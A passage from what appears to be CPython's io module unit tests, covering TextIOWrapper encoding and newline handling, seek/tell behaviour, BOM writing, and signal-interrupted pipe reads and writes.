t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super(MyTextIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyTextIO, self).close()
def flush(self):
record.append(3)
super(MyTextIO, self).flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin1", "utf8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(IOError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
f = self.open(support.TESTFN, "wb")
f.write(line*2)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
s = f.read(prefix_size)
self.assertEqual(s, prefix.decode("ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
f = self.open(support.TESTFN, "wb")
f.write(data)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(IOError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=lambda n=x: run(n))
for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02)
event.set()
for t in threads:
t.join()
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
def bad_flush():
raise IOError()
txt.flush = bad_flush
self.assertRaises(IOError, txt.close) # exception not swallowed
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises((AttributeError, TypeError)):
txt.buffer = buf
class CTextIOWrapperTest(TextIOWrapperTest):
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
pass
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(b))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertTrue(obj is not None, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
self.assertRaises(TypeError, self.BlockingIOError)
self.assertRaises(TypeError, self.BlockingIOError, 1)
self.assertRaises(TypeError, self.BlockingIOError, 1, 2, 3, 4)
self.assertRaises(TypeError, self.BlockingIOError, 1, "", None)
b = self.BlockingIOError(1, "")
self.assertEqual(b.characters_written, 0)
class C(unicode):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
def _set_non_blocking(self, fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
self.assertNotEqual(flags, -1)
res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.assertEqual(res, 0)
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
self._set_non_blocking(r)
self._set_non_blocking(w)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertTrue(sent == received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
class CMiscIOTest(MiscIOTest):
io = io
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1 // 0
@unittest.skipUnless(threading, 'Threading required for this test.')
@unittest.skipIf(sys.platform in ('freebsd5', 'freebsd6', 'freebsd7'),
'issue #12429: skip test on FreeBSD <= 7')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
signal.alarm(1)
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
self.assertRaises(ZeroDivisionError,
wio.write, item * (1024 * 1024))
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1//0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupterd_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupterd_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = 1024 * 1024
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
def _read():
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
